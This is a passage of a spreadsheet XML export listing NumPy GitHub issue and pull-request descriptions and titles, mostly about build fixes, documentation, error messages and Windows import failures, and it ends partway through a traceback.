* BUG: Don't use `close_fds`, which fails on windows_x000D_
_x000D_
This argument was introduced along with subprocess in_x000D_
f5afa7836d56640f25ff3fbd2c59b8dcf016e26f to replace `popen4`, and_x000D_
probably wasn't necessary in the first place._x000D_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</si>
  <si>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Fixes to numpy.distutils.Configuration.get_version (#13056)</t>
  </si>
  <si>
    <t>Removed the claim that tensordot only works on arrays with len(shape) &gt;= 1_x000D_
_x000D_
Ref: Github issue #12130</t>
  </si>
  <si>
    <t>DOC: Removed incorrect claim regarding shape constraints for np.tenso…</t>
  </si>
  <si>
    <t>Not super important, but saves some lines. Only the low-hanging ones here._x000D_
_x000D_
Found while tracking down an unrelated ResourceWarning_x000D_
_x000D_
Hiding whitespace in the diff makes it pretty easy to skim over</t>
  </si>
  <si>
    <t>MAINT: Use with statements for opening files in distutils</t>
  </si>
  <si>
    <t>Fail documentation builds if there are any warnings._x000D_
_x000D_
It turns out my optimism after #13002 was not quite justified. There are a few `warnings` not `WARNINGS` still when building documentation, those cause the build to fail when using `-WT`._x000D_
_x000D_
@rgommers suggested using `--keep-going`. Unfortunately this is a sphinx 1.8+ feature, which we cannot use due to scipy/scipy-sphinx-theme#9, which we really should fix._x000D_
_x000D_
EDIT: the `scipy-sphinx-theme` related issue was fixed in Sphinx; Sphinx 1.8.3+ is backward compatible.</t>
  </si>
  <si>
    <t>DOC, BUILD: fail on doc build warnings</t>
  </si>
  <si>
    <t>Two fixes to recent merged PRs:_x000D_
_x000D_
I merged #13058 but it was not correct. Reverted_x000D_
_x000D_
My `make dist` for documentation does not like the colon merged in #13050. Reworked to avoid it.</t>
  </si>
  <si>
    <t>DOC: revert PR #13058 and fixup Makefile</t>
  </si>
  <si>
    <t>```_x000D_
In [1]: np.datetime64(2**63, 'D')_x000D_
---------------------------------------------------------------------------_x000D_
OverflowError                             Traceback (most recent call last)_x000D_
OverflowError: int too big to convert_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
SystemError                               Traceback (most recent call last)_x000D_
&lt;ipython-input-13-c84d46e92f52&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.datetime64(2**63, 'D')_x000D_
_x000D_
SystemError: &lt;class 'numpy.datetime64'&gt; returned a result with an error set_x000D_
```</t>
  </si>
  <si>
    <t>BUG: np.datetime64(2**63, 'D') raises SystemError on windows</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #7801._x000D_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</si>
  <si>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Use C call to sysctlbyname for AVX detection on MacOS</t>
  </si>
  <si>
    <t xml:space="preserve">Adding 'strictly' to make the conditions to be met by the `xp` argument even more clear._x000D_
Following the suggestion in https://github.com/numpy/numpy/issues/10448#issuecomment-468302058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</si>
  <si>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update docstring in numpy.interp docstring</t>
  </si>
  <si>
    <t>This [emitted a ResourceWarning](https://travis-ci.org/numpy/numpy/jobs/499665501#L2687) as previously written, as the streams never got closed._x000D_
_x000D_
This change also detects errors in `svnversion` and `hg`, rather than ignoring the error code and hoping stdout contains a revision anyway.</t>
  </si>
  <si>
    <t>BUG: Fixes to numpy.distutils.Configuration.get_version</t>
  </si>
  <si>
    <t xml:space="preserve">- add 1.16.2-changelog.rst_x000D_
- add 1.16.2-notes.rst_x000D_
- update mailmap_x000D_
- update release.rst_x000D_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</si>
  <si>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Post NumPy 1.16.2 release update.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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import numpy as np_x000D_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Traceback (most recent call last):_x000D_
  File "&lt;pyshell#0&gt;", line 1, in &lt;module&gt;_x000D_
    import numpy_x000D_
  File "D:\Python\Python36\lib\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "D:\Python\Python36\lib\site-packages\numpy\core\__init__.py", line 42, in &lt;module&gt;_x000D_
    for envkey in env_added:_x000D_
NameError: name 'env_added' is not defined_x000D_
### Numpy/Python version information:_x000D_
numpy-1.16.2+mkl-cp36-cp36m-win_amd64_x000D_
python 3.6.7_x000D_
```_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>can not import numpy. NameError: name 'env_added' is not defined</t>
  </si>
  <si>
    <t>['29 - Intel/Anaconda', 'component: build']</t>
  </si>
  <si>
    <t>Follow-up to gh-12911</t>
  </si>
  <si>
    <t>BLD: make doc build work more robustly.</t>
  </si>
  <si>
    <t>If a python-level class defined the ``__buffer__`` attribute, `frombuffer(buf, ...)` would assume it returns the instance as a buffer. This was undocumented and flaky: if the_x000D_
``__buffer__`` attribute was a method it would not be called. I tried to search for where this was ever used and got back to the original `numeric` code, where [once](https://github.com/numpy/numpy/blob/cffb9714779adc0156c36bb55d0a1e8a29589408/numpy/numarray/_capi.c#L54) it was a method to be called, but [elsewhere](https://github.com/numpy/numpy/blob/cffb9714779adc0156c36bb55d0a1e8a29589408/numpy/core/src/multiarraymodule.c#L6453) an attribute. This second use was preserved until today._x000D_
_x000D_
Since it is undocumented I do not think we need a deprecation cycle. Should this hit the mailing list?</t>
  </si>
  <si>
    <t>MAINT: remove undocumented __buffer__ attribute lookup</t>
  </si>
  <si>
    <t xml:space="preserve">Added a more clear error message when calling np.zeros, ones, empty for a common mistake._x000D_
_x000D_
This happens a lot, especially since np.random.randn doesn't accept a list/tuple._x000D_
_x000D_
This was orginally requested by Andrej Karpathy on twitter. https://twitter.com/karpathy/status/1099793055853375489_x000D_
_x000D_
_x000D_
‏_x000D_
</t>
  </si>
  <si>
    <t>MAINT:  Better error messages for zeros, ones, empty.</t>
  </si>
  <si>
    <t>['01 - Enhancement', '50 - Duplicate', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">This solves https://github.com/numpy/numpy/issues/13043._x000D_
_x000D_
@shoyer @mrocklin @hameerabbasi </t>
  </si>
  <si>
    <t>ENH: Add shape to *_like() array creation</t>
  </si>
  <si>
    <t xml:space="preserve">- Create changelog_x000D_
- Update release notes_x000D_
- Update mailmap_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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Prepare for 1.16.2 release.</t>
  </si>
  <si>
    <t>This is currently 3 links deep.</t>
  </si>
  <si>
    <t>DOC: link to devdocs in README</t>
  </si>
  <si>
    <t>Following the discussion in https://github.com/dask/dask/issues/4462, in some cases it's necessary to create a new array of the same NumPy-like type (e.g., sparse or CuPy) as the input array. This can be achieved by using `{empty,full,ones,zeros}_like()` functions. However, this prevents a new array of arbitrary shape to be created._x000D_
_x000D_
@shoyer suggested the following change in https://github.com/dask/dask/issues/4462:_x000D_
_x000D_
&gt; What about adding a `shape` keyword argument to NumPy's `zeros_like`, `ones_like` and `full_like`? There's some precedence for overwriting attributes of the original array with the `dtype` argument already._x000D_
_x000D_
I think this is a good solution and I would like to see this implemented. I will be opening a PR for this soon._x000D_
_x000D_
@mrocklin @hameerabbasi FYI</t>
  </si>
  <si>
    <t>Allow creation of *_like() arrays of arbitrary shapes</t>
  </si>
  <si>
    <t>Alternative to #12994 _x000D_
_x000D_
As discussed in #12667 by @rgommers, this may have the advantage of not bricking SciPy / ecosystem projects since it confines the "guaranteed" openblas-related DLL load to numpy/core instead of the distutils machinery change.</t>
  </si>
  <si>
    <t>BLD: Windows absolute path DLL loading</t>
  </si>
  <si>
    <t>['29 - Intel/Anaconda', 'component: distribution']</t>
  </si>
  <si>
    <t>Improved exception message when two integers are passed as arguments which are pretended to be shape_x000D_
_x000D_
`np.zeros(2, 3) # =&gt; TypeError: Did you mean to use a tuple as shape?'`</t>
  </si>
  <si>
    <t>MAINT: Improve error message when shape is wrongly specified.</t>
  </si>
  <si>
    <t>Thanks to a change in exec_command, these strings are no longer passed onto the shell._x000D_
Since config files do not support list values, our best bet is to perform shell-splitting immediately._x000D_
_x000D_
Likely fixes gh-12659_x000D_
_x000D_
[Backport here](https://github.com/numpy/numpy/compare/maintenance/1.16.x...eric-wieser:distutils-shlex-split)_x000D_
_x000D_
Note that azure CI fails because this doesn't contain either of #12903 or #12909, in the interest of having a common merge base for backporting. Had we taken the merge-base approach in those PRs, it would be possible to merge the commit in directly._x000D_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---_x000D_
_x000D_
To be clear: this is blocked by a decision on #12979</t>
  </si>
  <si>
    <t>BUG: parse shell escaping in extra_compile_args and extra_link_args</t>
  </si>
  <si>
    <t>[Numpy 1.17 will drop support for Python 2.7](http://www.numpy.org/neps/nep-0014-dropping-python2.7-proposal.html) and [will require Python at least 3.5](https://github.com/numpy/numpy/blob/master/setup.py#L30-L31)._x000D_
_x000D_
Numpy currently uses quite a bit of code to behave well with Python 2.7-3.4 ([Python code](https://github.com/numpy/numpy/search?q=sys.version_info&amp;unscoped_q=sys.version_info), [C code](https://github.com/numpy/numpy/search?q=NPY_PY3K)). This code is not needed anymore in Numpy 1.17 and introduces a lot of clutter in the code base._x000D_
_x000D_
Would you welcome PRs that remove the legacy code?_x000D_
_x000D_
Possible drawbacks: It may make it a bit harder to backport fixes from Numpy 1.17 to 1.16. Large-scale refactoring always has the possibility to introduce bugs.</t>
  </si>
  <si>
    <t>MAINT: Remove Python 2 compatibility code</t>
  </si>
  <si>
    <t>['03 - Maintenance', '15 - Discussion']</t>
  </si>
  <si>
    <t>I've seen people complain in the past that `randn(M, N)` is inconsistent with `zeros((M, N))`. They're right, but they're missing the point that `randn` exists to be consistent with Matlab, not to be self-consistent with numpy._x000D_
_x000D_
Let's point those users more obviously to the function they're looking for.</t>
  </si>
  <si>
    <t>DOC: Draw more attention to which functions in random are convenience wrappers</t>
  </si>
  <si>
    <t>Cleanup based on https://github.com/numpy/numpy/issues/13024._x000D_
_x000D_
Remaining `= property` code is in numpy/ma/core.py:_x000D_
_x000D_
* `mask = property(fget=_get_mask, fset=__setmask__, doc="Mask")` -- should I rewrite `__setmask__` as the `mask.setter`? It has a `copy=False` default arg though so seems like we need this method defined with the extra arg._x000D_
* `_data = property(fget=_get_data)` and `data = property(fget=_get_data)`, these ones were giving a bit of trouble, not sure why. Do we want all of these defined or do we ultimately want just data defined, and update the places that are using `_data`?_x000D_
_x000D_
Hoping to get familiar with numpy's code base over time and contribute!</t>
  </si>
  <si>
    <t>MAINT: Convert property to @property</t>
  </si>
  <si>
    <t>Some cleanup to make #12519 a bit more manageable._x000D_
_x000D_
This will also impact #12988 in a minor way._x000D_
_x000D_
First commit is a straight copy-paste, second is a reordering.</t>
  </si>
  <si>
    <t xml:space="preserve"> MAINT: Extract the loop macros into their own header </t>
  </si>
  <si>
    <t>Another blocker for #12519 ._x000D_
_x000D_
Also removes some instance of by-column wrapping, which is enough to trick my editor into thinking this file uses 2-space indents.</t>
  </si>
  <si>
    <t>MAINT: Replace if statement with a dictionary lookup for ease of extensibility in ufunc generator</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes gh-12979_x000D_
_x000D_
Among other things, this means setting the `F90` environment variable to `"path to/f90" --coverage` works again._x000D_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</si>
  <si>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regression in parsing of F90 and F77 environment variables</t>
  </si>
  <si>
    <t>['06 - Regression', 'component: numpy.distutils', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13023._x000D_
_x000D_
There are places in distutils where we accept a single string from the user, and interpret it as a set of command line arguments._x000D_
Previously, these were passed on as a string unmodified to exec_command, and interpreted by subprocess in a platform-specific way._x000D_
_x000D_
Recent changes to distutils now pass a list of arguments to subprocess, meaning we have to split the strings ourselves._x000D_
While `shlex.split` is perfect on posix systems, it is not a good approximation of either the old or the expected behavior on windows._x000D_
_x000D_
Provides the building blocks needed to fix gh-12979_x000D_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</si>
  <si>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Add functions to parse shell-strings in the platform-native way</t>
  </si>
  <si>
    <t>In numpy.ma.core calls to `property` are used instead of the `@property` and `@property.setter` decorator. These should be refactored with an eye to rebuilding the documentation to make sure the docstrings do not get lost.</t>
  </si>
  <si>
    <t>MAINT: refactor property function calls to property/property.setter decorators</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.ma', 'good first issue']</t>
  </si>
  <si>
    <t>A good starter issue - there are some places in numpy that use the pre-decorator property syntax:_x000D_
```python_x000D_
def set_mask(self, value):_x000D_
    ..._x000D_
def get_mask(self):_x000D_
    ..._x000D_
mask = property(fget=get_mask, fset=set_mask, doc="the docstring")_x000D_
```_x000D_
_x000D_
It would be some nice cleanup to go through these and replace them with_x000D_
```python_x000D_
@property_x000D_
def mask(self):_x000D_
    """_x000D_
    the docstring_x000D_
    """_x000D_
    # the contents of get_mask_x000D_
_x000D_
@mask.setter_x000D_
def mask(self, value):_x000D_
    # the contents of set_mask_x000D_
_x000D_
# only needed if `set_mask` and `get_mask` do not start with `_`:_x000D_
# for compatibility_x000D_
get_mask = mask.fget_x000D_
set_mask = mask.fset_x000D_
```_x000D_
_x000D_
An easy way to find these is to search the source for ` = property(`.</t>
  </si>
  <si>
    <t>Convert uses of `property` to `@property`</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'good first issue']</t>
  </si>
  <si>
    <t xml:space="preserve">There are places in distutils where we accept a single string from the user, and interpret it as a set of command line arguments._x000D_
Previously, these were passed on as a string unmodified to exec_command, and interpreted by subprocess in a platform-specific way._x000D_
_x000D_
Recent changes to distutils now pass a list of arguments to subprocess, meaning we have to split the strings ourselves._x000D_
While `shlex.split` is perfect on posix systems, it is not a good approximation of either the old or the expected behavior on windows._x000D_
_x000D_
[Backport here](https://github.com/numpy/numpy/compare/maintenance/1.16.x...eric-wieser:distutils-windows-split)_x000D_
</t>
  </si>
  <si>
    <t>BUG: Changes to string-to-shell parsing behavior broke paths with quotes</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12846._x000D_
_x000D_
Previously when doing floor division numpy would sometimes return an incorrect_x000D_
signed zero. For example:_x000D_
```_x000D_
&gt;&gt;&gt; np.zeros(10)//1_x000D_
array([-0., -0., -0., -0., -0., -0., -0., -0., -0., -0.])_x000D_
_x000D_
&gt;&gt;&gt; np.remainder(-1.0,1.0)_x000D_
-0.0_x000D_
```_x000D_
The reason for this is that whenever div or mod were zero the code was using_x000D_
the following to pick the sign of zero:_x000D_
_x000D_
floordiv = (a / b &gt; 0) ? 0.0@c@ : -0.0@c@;_x000D_
_x000D_
This commit updates these lines to instead use the copysign function which is_x000D_
how cpython does floor division._x000D_
_x000D_
Fixes #12841._x000D_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</si>
  <si>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signed zero behavior in npy_divmod</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.array(['6693.0', '8974.0', '5893.0', '5877.0', '9060.0', '6149.0', '7231.0', '5813.0', '7367.0', '6313.0', '399.0', '11904.0', '302.6666666666667', '7173.0', '2753.0', '176.0', '332.0', '4462.0', '1691.25', '21394746.0', '304.0', '1649.0', '77.0', '901.0', '222.67567567567568', '201.33333333333334', '73.5'])_x000D_
dataset = np.column_stack((a, a))_x000D_
dataset_scaled = dataset.copy()_x000D_
_x000D_
from sklearn import preprocessing_x000D_
min_max_scaler = preprocessing.MinMaxScaler()_x000D_
dataset_scaled[:, 1:] = min_max_scaler.fit_transform(dataset_scaled[:, 1:])_x000D_
```_x000D_
When I use Min Max I have a Warning, but i think it's irrilevant:_x000D_
_x000D_
&gt; sklearn\utils\validation.py:595: DataConversionWarning: Data with input dtype &lt;U18 was converted to float64 by MinMaxScaler._x000D_
&gt;   warnings.warn(msg, DataConversionWarning)_x000D_
_x000D_
Thi is the Output of dataset_scaled:_x000D_
```python_x000D_
dataset_scaled_x000D_
Out[159]: _x000D_
array([['6693.0', '0.0003093994544669'],_x000D_
       ['8974.0', '0.0004160147812498'],_x000D_
       ['5893.0', '0.0002720069680898'],_x000D_
       ['5877.0', '0.0002712591183622'],_x000D_
       ['9060.0', '0.0004200344735354'],_x000D_
       ['6149.0', '0.0002839725637305'],_x000D_
       ['7231.0', '0.0003345459015556'],_x000D_
       ['5813.0', '0.0002682677194521'],_x000D_
       ['7367.0', '0.0003409026242397'],_x000D_
       ['6313.0', '0.0002916380234378'],_x000D_
       ['399.0', '1.5214067894706029'],_x000D_
       ['11904.0', '0.0005529647626062'],_x000D_
       ['302.6666666666667', '1.071138932678996e'],_x000D_
       ['7173.0', '0.0003318349462932'],_x000D_
       ['2753.0', '0.0001252414590594'],_x000D_
       ['176.0', '4.7909123170733275'],_x000D_
       ['332.0', '1.2082447160619073'],_x000D_
       ['4462.0', '0.0002051211580826'],_x000D_
       ['1691.25', '7.561461854580854e'],_x000D_
       ['21394746.0', '0.9999999999999999'],_x000D_
       ['304.0', '1.0773710137418555'],_x000D_
       ['1649.0', '7.363982785901489e'],_x000D_
       ['77.0', '1.6359212790006476'],_x000D_
       ['901.0', '3.867785309637248e'],_x000D_
       ['222.67567567567568', '6.972561775632493e'],_x000D_
       ['201.33333333333334', '5.975007719016654e'],_x000D_
       ['73.5', '0.0']], dtype='&lt;U18')_x000D_
```_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
The error happens when i try to convert to float:_x000D_
`dataset_scaled.astype(np.float)`_x000D_
### Error message:_x000D_
ValueError: could not convert string to float: **'1.071138932678996e'** (thirteenth row)_x000D_
_x000D_
I don't know if it's a Scikit problem in the conversion or Numpy problem in the column selection...I try to bring it back to the skikit developers too_x000D_
### Numpy/Python version information: Python 3.7.1, numpy 1.15.4_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
Workaround that works:_x000D_
```python_x000D_
dataset_scaled2 = dataset.copy()_x000D_
dataset_scaled2 = min_max_scaler.fit_transform(dataset_scaled2)_x000D_
```_x000D_
The line that created problems is now correct:_x000D_
_x000D_
&gt; [1.07113893e-05, 1.07113893e-05],_x000D_
</t>
  </si>
  <si>
    <t>impossible to convert float, the exponent is cut</t>
  </si>
  <si>
    <t>I've been using Anaconda environment for 1 year. Suddenly today after the installation of beatifulsoup4 with pip, i'm not able anymore to work with jupyter or ipython. If i try to import numpy or pandas or matplotlib i receive this error: _x000D_
_x000D_
## Python 3.7.2 (default, Feb 11 2019, 14:11:50) [MSC v.1915 64 bit (AMD64)]_x000D_
## IPython 6.5.0 -- An enhanced Interactive Python. Type '?' for help.:_x000D_
_x000D_
I tried the  "pip install --upgrade --force-reinstall numpy" but it didn't work._x000D_
_x000D_
This message appears:_x000D_
_x000D_
`import numpy`_x000D_
_x000D_
&gt; ImportError                               Traceback (most recent call last)_x000D_
&gt; ~\Anaconda3\lib\site-packages\numpy\core\__init__.py in &lt;module&gt;()_x000D_
&gt;      15 try:_x000D_
&gt; ---&gt; 16     from . import multiarray_x000D_
&gt;      17 except ImportError as exc:_x000D_
&gt; _x000D_
&gt; ~\Anaconda3\lib\site-packages\numpy\core\multiarray.py in &lt;module&gt;()_x000D_
&gt;      11_x000D_
&gt; ---&gt; 12 from . import overrides_x000D_
&gt;      13 from . import _multiarray_umath_x000D_
&gt; _x000D_
&gt; ~\Anaconda3\lib\site-packages\numpy\core\overrides.py in &lt;module&gt;()_x000D_
&gt;       5_x000D_
&gt; ----&gt; 6 from numpy.core._multiarray_umath import (_x000D_
&gt;       7     add_docstring, implement_array_function, _get_implementing_args)_x000D_
&gt; _x000D_
&gt; ImportError: DLL load failed: Impossibile trovare il modulo specificato._x000D_
&gt; _x000D_
&gt; During handling of the above exception, another exception occurred:_x000D_
&gt; _x000D_
&gt; ImportError                               Traceback (most recent call last)_x000D_
&gt; &lt;ipython-input-5-d4cdadb62aa7&gt; in &lt;module&gt;()_x000D_
&gt; ----&gt; 1 import numpy_x000D_
&gt; _x000D_
&gt; ~\Anaconda3\lib\site-packages\numpy\__init__.py in &lt;module&gt;()_x000D_
&gt;     140     from . import _distributor_init_x000D_
&gt;     141_x000D_
&gt; --&gt; 142     from . import core_x000D_
&gt;     143     from .core import *_x000D_
&gt;     144     from . import compat_x000D_
&gt; _x000D_
&gt; ~\Anaconda3\lib\site-packages\numpy\core\__init__.py in &lt;module&gt;()_x000D_
&gt;      45 Original error was: %s_x000D_
&gt;      46 """ % (sys.executable, exc)_x000D_
&gt; ---&gt; 47     raise ImportError(msg)_x000D_
&gt;      48 finally:_x000D_
&gt;      49     for envkey in env_added:_x000D_
_x000D_
**and then** _x000D_
_x000D_
&gt; IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!_x000D_
&gt; _x000D_
&gt; _Importing the multiarray numpy extension module failed.  Most_x000D_
&gt; likely you are trying to import a failed build of numpy._x000D_
&gt; Here is how to proceed:_x000D_
&gt; - If you're working with a numpy git repository, try `git clean -xdf`_x000D_
&gt;   (removes all files not under version control) and rebuild numpy._x000D_
&gt; - If you are simply trying to use the numpy version that you have installed:_x000D_
&gt;   your installation is broken - please reinstall numpy._x000D_
&gt; - If you have already reinstalled and that did not fix the problem, then:_x000D_
&gt;   1. Check that you are using the Python you expect (you're using C:\Users\Admin\Anaconda3\python.exe),_x000D_
&gt;      and that you have no directories in your PATH or PYTHONPATH that can_x000D_
&gt;      interfere with the Python and numpy versions you're trying to use._x000D_
&gt;   2. If (1) looks fine, you can open a new issue at_x000D_
&gt;      https://github.com/numpy/numpy/issues.  Please include details on:_x000D_
&gt;      - how you installed Python_x000D_
&gt;      - how you installed numpy_x000D_
&gt;      - your operating system_x000D_
&gt;      - whether or not you have multiple versions of Python installed_x000D_
&gt;      - if you built from source, your compiler versions and ideally a build log_x000D_
&gt; _x000D_
&gt;      Note: this error has many possible causes, so please don't comment on_x000D_
&gt;      an existing issue about this - open a new one instead._x000D_
&gt; _x000D_
&gt; Original error was: DLL load failed: Impossibile trovare il modulo specificato._x000D_
_x000D_
**If i import sklearn....**_x000D_
_x000D_
`import sklearn`_x000D_
_x000D_
&gt;  ImportError: No module named 'sklearn.__check_build._check_build'_x000D_
&gt; ____________________________________________________________________________x000D_
&gt; Contents of C:\Users\Admin\Anaconda3\lib\site-packages\sklearn\__check_build:_x000D_
&gt; setup.py                  _check_build.cp36-win_amd64.pyd__init__.py_x000D_
&gt; __pycache___x000D_
&gt; ____________________________________________________________________________x000D_
&gt; It seems that scikit-learn has not been built correctly._x000D_
&gt; _x000D_
&gt; If you have installed scikit-learn from source, please do not forget_x000D_
&gt; to build the package before using it: run `python setup.py install` or_x000D_
&gt; `make` in the source directory._x000D_
&gt; _x000D_
&gt; If you have used an installer, please check that it is suited for your_x000D_
&gt; Python version, your operating system and your platform.</t>
  </si>
  <si>
    <t>Anaconda doesn't work anymore</t>
  </si>
  <si>
    <t xml:space="preserve">Naming a file `signal.py` breaks the import of numpy.testing_x000D_
_x000D_
### Reproducing code example:_x000D_
Name a file `signal.py` with the following content: _x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import numpy.testing as npt_x000D_
``` _x000D_
and run it._x000D_
NB: same error happens when copy/pasting those lines in the interpreter when the current directory contains the file `signal.py`._x000D_
_x000D_
### Error message:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "signal.py", line 3, in &lt;module&gt;_x000D_
    import numpy as np_x000D_
  File "/home/&lt;redacted&gt;/.local/share/virtualenvs/npt_import_bug-uRyhlZBt/lib/python3.6/site-packages/numpy/__init__.py", line 187, in &lt;module&gt;_x000D_
    from .testing import Tester_x000D_
  File "/home/&lt;redacted&gt;/.local/share/virtualenvs/npt_import_bug-uRyhlZBt/lib/python3.6/site-packages/numpy/testing/__init__.py", line 10, in &lt;module&gt;_x000D_
    from unittest import TestCase_x000D_
  File "/usr/lib/python3.6/unittest/__init__.py", line 64, in &lt;module&gt;_x000D_
    from .main import TestProgram, main_x000D_
  File "/usr/lib/python3.6/unittest/main.py", line 7, in &lt;module&gt;_x000D_
    from . import loader, runner_x000D_
  File "/usr/lib/python3.6/unittest/runner.py", line 8, in &lt;module&gt;_x000D_
    from .signals import registerResult_x000D_
  File "/usr/lib/python3.6/unittest/signals.py", line 1, in &lt;module&gt;_x000D_
    import signal_x000D_
  File "/home/&lt;redacted&gt;/npt_import_bug/signal.py", line 4, in &lt;module&gt;_x000D_
    import numpy.testing as npt_x000D_
AttributeError: module 'numpy' has no attribute 'testing'_x000D_
_x000D_
```_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
Python 3.6.7 (default, Oct 22 2018, 11:32:17) _x000D_
[GCC 8.2.0] on linux_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.16.1 3.6.7 (default, Oct 22 2018, 11:32:17) _x000D_
[GCC 8.2.0]_x000D_
_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Naming a file signal.py breaks the import of numpy.testing</t>
  </si>
  <si>
    <t>We are getting many new issues where users cannot load numpy on windows. Some (most?, all?) of the errors seem to be due to Anaconda breaking the use of `os.environ['PATH']` but it is hard to separate the wheat from the chaff. What suggestions or help should we give to users so they can solve this on their own?_x000D_
_x000D_
Which of these additional checks would be helpful, or would they be too error prone and fragile (where `.libs`) directory is the `extra_dll_dir` from [distutils] :_x000D_
- Does the `_multiarray_umath.pyd` file exist?_x000D_
- Does the `.libs` directory exist?_x000D_
- Does the `.libs` directory contain a `*dll`_x000D_
- Does `os.environ['PATH']` contain the `.libs` directory?_x000D_
- Are there broken elements in `os.environ['PATH']`? (not sure whether this is an issue or not)_x000D_
_x000D_
Any other ideas how to mitigate this? PR #12994 should solve this, but it seems to have stalled.</t>
  </si>
  <si>
    <t>ENH: improve error reporting on windows when numpy fails to load</t>
  </si>
  <si>
    <t>['15 - Discussion', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">The information in [`doc/source/user/c-info.how-to-extend.rst`](http://www.numpy.org/devdocs/user/c-info.how-to-extend.html#dealing-with-array-objects) is repeated in [`doc/source/reference/c-api.array.rst](http://www.numpy.org/devdocs/reference/c-api.array.html?highlight=pyarray_simplenewfromdata#creating-arrays). The first should only reference the second, and the descriptive text should be merged._x000D_
_x000D_
This may be a good starter task. The cycle to fix this issue, based on the [doc building documentation](http://www.numpy.org/devdocs/docs/howto_build_docs.html) is to _x000D_
_x000D_
1. create the documentation with `make html`_x000D_
2. Note the many warnings about `duplicate C object description` in the two files_x000D_
3. Edit the files to unify the documentation, one should be using `.. c:function::` to define the functions and the other using `:c:func:` to reference it, perhaps with descriptive text._x000D_
4. Use `firefox build/html/reference/c-api.array.html` and `firefox build/html/user/c-info.how-to-extend.html` to view the changes_x000D_
</t>
  </si>
  <si>
    <t>DOC: array creation API is defined twice in docs</t>
  </si>
  <si>
    <t xml:space="preserve">I am having the same exact issue:_x000D_
1. I Installe Miniconda, and used a 3.6 python  env for tensorflow. I could import tensorflow from the comnnad line so it works._x000D_
2. I installed numpy from the command line using conda install numpy_x000D_
3. I am using Windows 10, i have two pythons installed 3.6 and 3.7, but only he 3.6 environment is added to the PATH. _x000D_
I got this message_x000D_
C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\python.exe C:/Users/mahmad2/PycharmProjects/TF-TST/test.py_x000D_
Traceback (most recent call last):_x000D_
  File "C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\lib\site-packages\numpy\core\__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\lib\site-packages\numpy\core\multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\lib\site-packages\numpy\core\overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: DLL load failed: The specified module could not be found._x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "C:/Users/mahmad2/PycharmProjects/TF-TST/test.py", line 1, in &lt;module&gt;_x000D_
    import tensorflow as tf_x000D_
  File "C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\lib\site-packages\tensorflow\__init__.py", line 24, in &lt;module&gt;_x000D_
    from tensorflow.python import pywrap_tensorflow  # pylint: disable=unused-import_x000D_
  File "C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\lib\site-packages\tensorflow\python\__init__.py", line 47, in &lt;module&gt;_x000D_
    import numpy as np_x000D_
  File "C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\lib\site-packages\numpy\__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\lib\site-packages\numpy\core\__init__.py", line 47, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError: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C:\Users\mahmad2\AppData\Local\conda\conda\envs\tensorflow\python.exe),_x000D_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DLL load failed: The specified module could not be found._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ImportError: DLL load failed: The specified module could not be found. When using tensorflow on PyCharm</t>
  </si>
  <si>
    <t xml:space="preserve">I have 2 versions of python._x000D_
_x000D_
*D:\Python2.7\python2*_x000D_
*E:\maya2018\Maya2018\bin\mayapy*_x000D_
_x000D_
I want to use Numpy in mayapy._x000D_
Therefore, I copy the Numpy file in _x000D_
*D:\Python2.7\Lib\site-packages\numpy*_x000D_
 to _x000D_
*E:\maya2018\Maya2018\Python\Lib\site-packages*._x000D_
_x000D_
And then I open mayapy in cmd. _x000D_
```_x000D_
C:\Users\shiganquan&gt;mayapy_x000D_
Python 2.7.11 (default, Jul  1 2016, 02:08:48) [MSC v.1900 64 bit (AMD64)] on win32_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import numpy_x000D_
Traceback (most recent call last):_x000D_
